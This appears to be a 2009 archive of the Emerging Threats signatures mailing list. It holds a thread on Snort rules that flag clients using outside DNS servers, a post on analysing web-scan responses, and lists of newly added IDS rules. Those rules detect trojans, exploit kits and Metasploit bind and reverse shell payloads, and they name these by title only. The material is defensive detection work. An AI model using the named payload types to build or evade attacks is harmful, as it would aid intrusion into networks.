        2500542 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500543 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500544 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500545 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500546 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500547 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500548 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500549 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500550 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500551 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500552 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500553 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510542 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510543 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510544 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510545 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510546 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510547 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510548 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510549 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510550 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510551 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510552 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510553 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From cpb at google.com  Fri Dec  4 16:05:53 2009
From: cpb at google.com (Christopher Biettchert)
Date: Fri, 4 Dec 2009 13:05:53 -0800
Subject: [Emerging-Sigs] Google DNS servers
In-Reply-To: <f1b6c340912041249h1051ef47teaf0d754462edb54@mail.gmail.com>
References: <20091204122558.bi33n4t0ogok80co@mail.afferentsecurity.com>
	<f1b6c340912041249h1051ef47teaf0d754462edb54@mail.gmail.com>
Message-ID: <81b3d3d70912041305t1ca383d2ya53d547893cbf17c@mail.gmail.com>

I agree with using egress filtering if it is something you want to
stop. These rules should be focused on security events and not for
troubleshooting helpdesk calls.

On Fri, Dec 4, 2009 at 12:49 PM, CunningPike <cunningpike at gmail.com> wrote:
> On Fri, Dec 4, 2009 at 10:25 AM, Jack Pepper
> <pepperjack at afferentsecurity.com> wrote:
>> We try not to let users bypass our DNS servers, because we run
>> blackhole dns and other special DNS redirectors for malware, etc, plus
>> users who suddenly can't see internal web sites. ?This rule picks up
>> inside user trying to use one of the new super cool, "gosh why isn't
>> everybody using this" Google DNS servers.
>>
>> alert udp !$DNS_SERVERS any -> [8.8.8.0/24,8.8.4.0/24] 53 ( msg: "User
>> misconfigured DNS resolver to use Google DNS servers";
>> classtype:policy-violation; sid:1054432;threshold: type limit, track
>> by_src, seconds 1800, count 1; reference:
>> url,code.google.com/speed/public-dns/docs/using.html; rev:1;)
>>
> ?We use this more generic rule in our environment:
>
> alert udp !$DNS_SERVERS any -> $EXTERNAL_NET 53 (msg:"LOCAL Outbound
> Non-DNS Server DNS Traffic";
> content:"|01|";offset:2;depth:1;threshold:type limit,track
> by_src,count 1,seconds 60;classtype:misc-activity;sid:20000001;rev:1;)
>
> YMMV.
>
> CP
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>

From pepperjack at afferentsecurity.com  Fri Dec  4 16:39:59 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Fri, 04 Dec 2009 15:39:59 -0600
Subject: [Emerging-Sigs] Google DNS servers
In-Reply-To: <81b3d3d70912041305t1ca383d2ya53d547893cbf17c@mail.gmail.com>
References: <20091204122558.bi33n4t0ogok80co@mail.afferentsecurity.com>
	<f1b6c340912041249h1051ef47teaf0d754462edb54@mail.gmail.com>
	<81b3d3d70912041305t1ca383d2ya53d547893cbf17c@mail.gmail.com>
Message-ID: <20091204153959.dux4v1l0gg40osko@mail.afferentsecurity.com>

that's why it's classified as "policy-violation".  some snort users  
use the sensors to alert on policy violations as well as security  
issues.

jp

Quoting Christopher Biettchert <cpb at google.com>:

> I agree with using egress filtering if it is something you want to
> stop. These rules should be focused on security events and not for
> troubleshooting helpdesk calls.
>
> On Fri, Dec 4, 2009 at 12:49 PM, CunningPike <cunningpike at gmail.com> wrote:
>> On Fri, Dec 4, 2009 at 10:25 AM, Jack Pepper
>> <pepperjack at afferentsecurity.com> wrote:
>>> We try not to let users bypass our DNS servers, because we run
>>> blackhole dns and other special DNS redirectors for malware, etc, plus
>>> users who suddenly can't see internal web sites.  This rule picks up
>>> inside user trying to use one of the new super cool, "gosh why isn't
>>> everybody using this" Google DNS servers.
>>>
>>> alert udp !$DNS_SERVERS any -> [8.8.8.0/24,8.8.4.0/24] 53 ( msg: "User
>>> misconfigured DNS resolver to use Google DNS servers";
>>> classtype:policy-violation; sid:1054432;threshold: type limit, track
>>> by_src, seconds 1800, count 1; reference:
>>> url,code.google.com/speed/public-dns/docs/using.html; rev:1;)
>>>
>>  We use this more generic rule in our environment:
>>
>> alert udp !$DNS_SERVERS any -> $EXTERNAL_NET 53 (msg:"LOCAL Outbound
>> Non-DNS Server DNS Traffic";
>> content:"|01|";offset:2;depth:1;threshold:type limit,track
>> by_src,count 1,seconds 60;classtype:misc-activity;sid:20000001;rev:1;)
>>
>> YMMV.
>>
>> CP
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



-- 

Framework?  I don't need no stinking framework!

----------------------------------------------------------------
@fferent Security Labs:  Isolate/Insulate/Innovate  
http://www.afferentsecurity.com


From cpb at google.com  Fri Dec  4 16:57:24 2009
From: cpb at google.com (Christopher Biettchert)
Date: Fri, 4 Dec 2009 13:57:24 -0800
Subject: [Emerging-Sigs] Google DNS servers
In-Reply-To: <20091204153959.dux4v1l0gg40osko@mail.afferentsecurity.com>
References: <20091204122558.bi33n4t0ogok80co@mail.afferentsecurity.com>
	<f1b6c340912041249h1051ef47teaf0d754462edb54@mail.gmail.com>
	<81b3d3d70912041305t1ca383d2ya53d547893cbf17c@mail.gmail.com>
	<20091204153959.dux4v1l0gg40osko@mail.afferentsecurity.com>
Message-ID: <81b3d3d70912041357t49ccbae0r9938340c72044c95@mail.gmail.com>

I can accept that.

If going this route, a generic rule such as the ones presented would
be a better choice since there are several other public dns servers
available such as opendns, scrubit, 4.2.2.1-6, etc. Creating a list of
all of them is a losing battle. Whitelisting your dns servers and
alert when other ones are used by your client networks seems much more
manageable.

On Fri, Dec 4, 2009 at 1:39 PM, Jack Pepper
<pepperjack at afferentsecurity.com> wrote:
> that's why it's classified as "policy-violation". ?some snort users
> use the sensors to alert on policy violations as well as security
> issues.
>
> jp
>
> Quoting Christopher Biettchert <cpb at google.com>:
>
>> I agree with using egress filtering if it is something you want to
>> stop. These rules should be focused on security events and not for
>> troubleshooting helpdesk calls.
>>
>> On Fri, Dec 4, 2009 at 12:49 PM, CunningPike <cunningpike at gmail.com> wrote:
>>> On Fri, Dec 4, 2009 at 10:25 AM, Jack Pepper
>>> <pepperjack at afferentsecurity.com> wrote:
>>>> We try not to let users bypass our DNS servers, because we run
>>>> blackhole dns and other special DNS redirectors for malware, etc, plus
>>>> users who suddenly can't see internal web sites. ?This rule picks up
>>>> inside user trying to use one of the new super cool, "gosh why isn't
>>>> everybody using this" Google DNS servers.
>>>>
>>>> alert udp !$DNS_SERVERS any -> [8.8.8.0/24,8.8.4.0/24] 53 ( msg: "User
>>>> misconfigured DNS resolver to use Google DNS servers";
>>>> classtype:policy-violation; sid:1054432;threshold: type limit, track
>>>> by_src, seconds 1800, count 1; reference:
>>>> url,code.google.com/speed/public-dns/docs/using.html; rev:1;)
>>>>
>>> ?We use this more generic rule in our environment:
>>>
>>> alert udp !$DNS_SERVERS any -> $EXTERNAL_NET 53 (msg:"LOCAL Outbound
>>> Non-DNS Server DNS Traffic";
>>> content:"|01|";offset:2;depth:1;threshold:type limit,track
>>> by_src,count 1,seconds 60;classtype:misc-activity;sid:20000001;rev:1;)
>>>
>>> YMMV.
>>>
>>> CP
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>
>
>
> --
>
> Framework? ?I don't need no stinking framework!
>
> ----------------------------------------------------------------
> @fferent Security Labs: ?Isolate/Insulate/Innovate
> http://www.afferentsecurity.com
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>

From bschnzl at cotse.net  Sat Dec  5 01:45:08 2009
From: bschnzl at cotse.net (Bill Scherr IV)
Date: Sat, 05 Dec 2009 01:45:08 -0500
Subject: [Emerging-Sigs] Google DNS servers
In-Reply-To: <81b3d3d70912041357t49ccbae0r9938340c72044c95@mail.gmail.com>
References: <20091204122558.bi33n4t0ogok80co@mail.afferentsecurity.com>,
	<20091204153959.dux4v1l0gg40osko@mail.afferentsecurity.com>,
	<81b3d3d70912041357t49ccbae0r9938340c72044c95@mail.gmail.com>
Message-ID: <MTAwMDAyNy5ic2Nobnps.1259995511@quikprotect>

Hi All...

Closing port 53 to any but your recursive nameserver IS the only answer.

http://www.avolio.com/papers/7tenets.html

no exceptions!

B.

Circa 13:57, 4 Dec 2009, a note, claiming source Christopher Biettchert <cpb at google.com>, was sent 
to me:

Date sent:      	Fri, 4 Dec 2009 13:57:24 -0800
From:           	Christopher Biettchert <cpb at google.com>
To:             	Jack Pepper <pepperjack at afferentsecurity.com>
Copies to:      	emerging-sigs at emergingthreats.net
Subject:        	Re: [Emerging-Sigs] Google DNS servers

> I can accept that.
> 
> If going this route, a generic rule such as the ones presented would
> be a better choice since there are several other public dns servers
> available such as opendns, scrubit, 4.2.2.1-6, etc. Creating a list of
> all of them is a losing battle. Whitelisting your dns servers and
> alert when other ones are used by your client networks seems much more
> manageable.
> 
> On Fri, Dec 4, 2009 at 1:39 PM, Jack Pepper
> <pepperjack at afferentsecurity.com> wrote:
> > that's why it's classified as "policy-violation". ?some snort users
> > use the sensors to alert on policy violations as well as security
> > issues.
> >
> > jp
> >
> > Quoting Christopher Biettchert <cpb at google.com>:
> >
> >> I agree with using egress filtering if it is something you want to
> >> stop. These rules should be focused on security events and not for
> >> troubleshooting helpdesk calls.
> >>
> >> On Fri, Dec 4, 2009 at 12:49 PM, CunningPike <cunningpike at gmail.com> wrote:
> >>> On Fri, Dec 4, 2009 at 10:25 AM, Jack Pepper
> >>> <pepperjack at afferentsecurity.com> wrote:
> >>>> We try not to let users bypass our DNS servers, because we run
> >>>> blackhole dns and other special DNS redirectors for malware, etc, plus
> >>>> users who suddenly can't see internal web sites. ?This rule picks up
> >>>> inside user trying to use one of the new super cool, "gosh why isn't
> >>>> everybody using this" Google DNS servers.
> >>>>
> >>>> alert udp !$DNS_SERVERS any -> [8.8.8.0/24,8.8.4.0/24] 53 ( msg: "User
> >>>> misconfigured DNS resolver to use Google DNS servers";
> >>>> classtype:policy-violation; sid:1054432;threshold: type limit, track
> >>>> by_src, seconds 1800, count 1; reference:
> >>>> url,code.google.com/speed/public-dns/docs/using.html; rev:1;)
> >>>>
> >>> ?We use this more generic rule in our environment:
> >>>
> >>> alert udp !$DNS_SERVERS any -> $EXTERNAL_NET 53 (msg:"LOCAL Outbound
> >>> Non-DNS Server DNS Traffic";
> >>> content:"|01|";offset:2;depth:1;threshold:type limit,track
> >>> by_src,count 1,seconds 60;classtype:misc-activity;sid:20000001;rev:1;)
> >>>
> >>> YMMV.
> >>>
> >>> CP
> >>> _______________________________________________
> >>> Emerging-sigs mailing list
> >>> Emerging-sigs at emergingthreats.net
> >>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >>>
> >> _______________________________________________
> >> Emerging-sigs mailing list
> >> Emerging-sigs at emergingthreats.net
> >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >>
> >
> >
> >
> > --
> >
> > Framework? ?I don't need no stinking framework!
> >
> > ----------------------------------------------------------------
> > @fferent Security Labs: ?Isolate/Insulate/Innovate
> > http://www.afferentsecurity.com
> >
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs


Bill Scherr IV, GSEC, GCIA
Principal Security Engineer
EWA Information and Infrastructure Technologies
bscherr at iit-tek.com
bscherr at ewa.com
703-478-7608


From r.fulton at auckland.ac.nz  Sat Dec  5 14:01:07 2009
From: r.fulton at auckland.ac.nz (Russell Fulton)
Date: Sun, 6 Dec 2009 08:01:07 +1300
Subject: [Emerging-Sigs] alerting on responses (was- Is the VRT ruleset
	worth it?)
In-Reply-To: <4B18D619.6070707@windstream.net>
References: <6116b9e20912030906p7647df0exa625f9c71b4b3fa1@mail.gmail.com>
	<04550DFF-5D70-4BD9-919A-098E0B1FD807@jonkmans.com>
	<EBB1D200-BB8D-44AC-BE12-06E348B5FE38@auckland.ac.nz>
	<4B18D619.6070707@windstream.net>
Message-ID: <54D9A108-AE0C-4B39-9E4B-CA43E989EE06@auckland.ac.nz>


On 4/12/2009, at 10:27 PM, waldo kitty wrote:
> 
> the answer to this question is "yes" ;) especially if you are also looking at 
> the SANS @RISK postings... joomla is one of the most prominent apps listed... in 
> fact, watching the @RISK list almost makes me simply want to turn it all off 
> with all the notices of all the holes and such in so many commonly used apps :? 
> :? :(

Yes the open source CMS systems seem to be over represented :(  I think a large part of the problem is that they have lot of little bit and pieces that are contributed by amateurs and there does not seem to be any quality control that does even basic sanity checking.  

On the snort side part of the problem I see 500 odd alerts as someone goes through our network poking at web vulnerability of the day.  What I really want to know is which machines responded with something other than a file not found.  THe problem is compounded by many systems trapping 404s and sending back some flowery prose indistinguishable from a hit.  Sigh...

Any thought on analysing responses welcome!

Russell

From emerging at emergingthreats.net  Sat Dec  5 16:00:17 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat,  5 Dec 2009 16:00:17 -0500 (EST)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20091205210017.5735C4502D@goliath.jonkmans.com>


[***] Results from Oinkmaster started Sat Dec  5 16:00:17 2009 [***]

[+++]          Added rules:          [+++]

 2010451 - ET TROJAN Generic Dropper Post (FarmTime var) (emerging-virus.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (5):
        2010451 || ET TROJAN Generic Dropper Post (FarmTime var)
        2500542 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500543 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510542 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510543 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-sid-msg.map.txt (5):
        2010451 || ET TROJAN Generic Dropper Post (FarmTime var)
        2500542 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500543 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510542 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510543 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From emerging at emergingthreats.net  Sat Dec  5 18:00:13 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat,  5 Dec 2009 18:00:13 -0500 (EST)
Subject: [Emerging-Sigs] Emerging Threats Weekly Signature Changes
Message-ID: <20091205230013.4A93A4502D@goliath.jonkmans.com>


[***] Results from Oinkmaster started Sat Dec  5 18:00:13 2009 [***]

[+++]          Added rules:          [+++]

 2010369 - ET WEB_CLIENT Possible Symantec Altiris Deployment Solution and Notification Server ActiveX Control RunCmd Arbitrary Code Execution Attempt (emerging-web_client.rules)
 2010370 - ET WEB_CLIENT ACTIVEX Possible Symantec Altiris Deployment Solution and Notification Server ActiveX Control RunCmd Arbitrary Code Execution Function Call Attempt (emerging-web_client.rules)
 2010371 - ET SCAN Amap TCP Service Scan Detected (emerging-scan.rules)
 2010372 - ET SCAN Amap UDP Service Scan Detected (emerging-scan.rules)
 2010373 - ET WEB_CLIENT Haihaisoft Universal Player ActiveX Control URL Property Buffer Overflow Attempt (emerging-web_client.rules)
 2010374 - ET WEB_CLIENT ACTIVEX Haihaisoft Universal Player ActiveX Control URL Property Buffer Overflow Function Call Attempt (emerging-web_client.rules)
 2010375 - ET EXPLOIT Possible Oracle Database Text Component ctxsys.drvxtabc.create_tables Remote SQL Injection Attempt (emerging-exploit.rules)
 2010376 - ET CURRENT_EVENTS WU Malicious Spam Inbound (emerging-current_events.rules)
 2010377 - ET POLICY JBOSS/JMX 80 access from outside (emerging-policy.rules)
 2010378 - ET POLICY JBOSS/JMX 8080 access from outside (emerging-policy.rules)
 2010379 - ET WEB-APPS JBOSS/JMX REMOTE WAR deployment attempt (POST) (emerging-web_server.rules)
 2010380 - ET WEB-APPS JBOSS/JMX REMOTE WAR deployment attempt (GET) (emerging-web_server.rules)
 2010381 - ET TROJAN Bredolab Checkin (emerging-virus.rules)
 2010382 - ET TROJAN Fake AV GET (emerging-virus.rules)
 2010383 - ET EXPLOIT METASPLOIT BSD Bind shell (emerging-exploit.rules)
 2010384 - ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 1) (emerging-exploit.rules)
 2010385 - ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 2) (emerging-exploit.rules)
 2010386 - ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 3) (emerging-exploit.rules)
 2010387 - ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 4) (emerging-exploit.rules)
 2010388 - ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 5) (emerging-exploit.rules)
 2010389 - ET EXPLOIT METASPLOIT BSD Bind shell (Pex Encoded 1) (emerging-exploit.rules)
 2010390 - ET EXPLOIT METASPLOIT BSD Bind shell (Pex Encoded 2) (emerging-exploit.rules)
 2010391 - ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 1) (emerging-exploit.rules)
 2010392 - ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 2) (emerging-exploit.rules)
 2010393 - ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 3) (emerging-exploit.rules)
 2010394 - ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 4) (emerging-exploit.rules)
 2010395 - ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 5) (emerging-exploit.rules)
 2010396 - ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 1) (emerging-exploit.rules)
 2010397 - ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 2) (emerging-exploit.rules)
 2010398 - ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 3) (emerging-exploit.rules)
 2010399 - ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 4) (emerging-exploit.rules)
 2010400 - ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 5) (emerging-exploit.rules)
 2010401 - ET EXPLOIT METASPLOIT BSD Bind shell (PexFstEnvMov Encoded 1) (emerging-exploit.rules)
 2010402 - ET EXPLOIT METASPLOIT BSD Bind shell (PexFstEnvMov Encoded 2) (emerging-exploit.rules)
 2010403 - ET EXPLOIT METASPLOIT BSD Bind shell (JmpCallAdditive Encoded) (emerging-exploit.rules)
 2010404 - ET EXPLOIT METASPLOIT BSD Bind shell (Alpha2 Encoded 1) (emerging-exploit.rules)
 2010405 - ET EXPLOIT METASPLOIT BSD Bind shell (Alpha2 Encoded 2) (emerging-exploit.rules)
 2010406 - ET EXPLOIT METASPLOIT BSD Bind shell (Alpha2 Encoded 3) (emerging-exploit.rules)
 2010407 - ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvSub Encoded 1) (emerging-exploit.rules)
 2010408 - ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvSub Encoded 2) (emerging-exploit.rules)
 2010409 - ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 1) (emerging-exploit.rules)
 2010410 - ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 2) (emerging-exploit.rules)
 2010411 - ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 3) (emerging-exploit.rules)
 2010412 - ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 4) (emerging-exploit.rules)
 2010413 - ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Encoded 1) (emerging-exploit.rules)
 2010414 - ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Encoded 2) (emerging-exploit.rules)
 2010415 - ET EXPLOIT METASPLOIT BSD Reverse shell (Not Encoded 1) (emerging-exploit.rules)
 2010416 - ET EXPLOIT METASPLOIT BSD Reverse shell (Not Encoded 2) (emerging-exploit.rules)
 2010417 - ET EXPLOIT METASPLOIT BSD Reverse shell (Not Encoded 3) (emerging-exploit.rules)
 2010418 - ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Alphanumeric Encoded 1) (emerging-exploit.rules)
 2010419 - ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Alphanumeric Encoded 2) (emerging-exploit.rules)
 2010420 - ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Alphanumeric Encoded 3) (emerging-exploit.rules)
 2010421 - ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvMov Encoded 1) (emerging-exploit.rules)
 2010422 - ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvMov Encoded 2) (emerging-exploit.rules)
 2010423 - ET EXPLOIT METASPLOIT BSD Reverse shell (JmpCallAdditive Encoded 1) (emerging-exploit.rules)
 2010424 - ET EXPLOIT METASPLOIT BSD Reverse shell (Alpha2 Encoded 1) (emerging-exploit.rules)
 2010425 - ET EXPLOIT METASPLOIT BSD Reverse shell (Alpha2 Encoded 2) (emerging-exploit.rules)
 2010426 - ET EXPLOIT METASPLOIT BSD Reverse shell (Alpha2 Encoded 3) (emerging-exploit.rules)
 2010427 - ET EXPLOIT METASPLOIT BSD SPARC Bind shell (SPARC Encoded 1) (emerging-exploit.rules)
 2010428 - ET EXPLOIT METASPLOIT BSD SPARC Bind shell (SPARC Encoded 2) (emerging-exploit.rules)
 2010429 - ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 1) (emerging-exploit.rules)
 2010430 - ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 2) (emerging-exploit.rules)
 2010431 - ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 3) (emerging-exploit.rules)
 2010432 - ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 4) (emerging-exploit.rules)
 2010433 - ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (Not Encoded 1) (emerging-exploit.rules)
 2010434 - ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (Not Encoded 2) (emerging-exploit.rules)
 2010435 - ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (SPARC Encoded 1) (emerging-exploit.rules)
 2010436 - ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (SPARC Encoded 2) (emerging-exploit.rules)
 2010437 - ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (Not Encoded 3) (emerging-exploit.rules)
 2010438 - ET MALWARE Possible Malicious Applet Access (justexploit kit) (emerging-malware.rules)
 2010439 - ET TROJAN Generic Trojan Checkin (UA VBTagEdit) (emerging-virus.rules)
 2010440 - ET CURRENT_EVENTS MALWARE Potential Malware Download, flash-HQ-plugin.40000.exe (emerging-current_events.rules)
 2010441 - ET TROJAN Possible Storm Variant HTTP Post (S) (emerging-virus.rules)
 2010442 - ET TROJAN Possible Storm Variant HTTP Post (U) (emerging-virus.rules)
 2010443 - ET CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus downloader (installer.1.exe) (emerging-current_events.rules)
 2010444 - ET CURRENT_EVENTS MALWARE Potential Malware Download, pdf exploit (emerging-current_events.rules)
 2010445 - ET CURRENT_EVENTS MALWARE Potential Malware Download, java exploit (emerging-current_events.rules)
 2010446 - ET CURRENT_EVENTS MALWARE Potential Malware Download, loadjavad.php exploit (emerging-current_events.rules)
 2010447 - ET CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus (IAInstall.exe) (emerging-current_events.rules)
 2010448 - ET CURRENT_EVENTS MALWARE Potential Malware Download, trojan zbot (emerging-current_events.rules)
 2010449 - ET CURRENT_EVENTS MALWARE Potential Malware Download, exploit redirect (emerging-current_events.rules)
 2010450 - ET TROJAN Potential Gemini/Fake AV Download URL Detected (emerging-virus.rules)
 2010451 - ET TROJAN Generic Dropper Post (FarmTime var) (emerging-virus.rules)


[///]     Modified active rules:     [///]

 2010050 - ET CURRENT_EVENTS MALWARE Likely Rogue Antivirus Download - Antivirus_21.exe (emerging-current_events.rules)
 2010066 - ET TROJAN Data POST to an image file (gif) (emerging-virus.rules)
 2010067 - ET TROJAN Data POST to an image file (jpg) (emerging-virus.rules)
 2010068 - ET TROJAN Data POST to an image file (jpeg) (emerging-virus.rules)
 2010069 - ET TROJAN Data POST to an image file (bmp) (emerging-virus.rules)
 2010070 - ET TROJAN Data POST to an image file (png) (emerging-virus.rules)
 2400000 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400001 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400002 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400003 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400004 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400005 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400006 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400007 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2401000 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401001 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401002 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401003 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401004 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
